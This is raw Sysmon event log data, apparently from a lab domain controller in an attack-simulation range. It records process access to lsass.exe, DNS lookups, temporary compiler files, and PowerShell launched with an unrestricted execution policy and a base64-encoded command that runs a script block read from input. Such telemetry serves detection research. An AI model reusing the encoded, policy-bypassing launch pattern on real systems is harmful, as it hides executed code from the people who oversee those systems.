JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.294{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4lax1uev.cmdline2021-01-18 13:33:16.294 11241100x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:16.294{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4lax1uev.dll2021-01-18 13:33:16.294 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.059{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.059{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.059{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.783{59A5CD1D-8E15-6005-B802-00000000A201}45601.0.0.127.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.783{59A5CD1D-8E15-6005-B802-00000000A201}45601.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8E1D-6005-C602-00000000A201}36764856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.755{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoA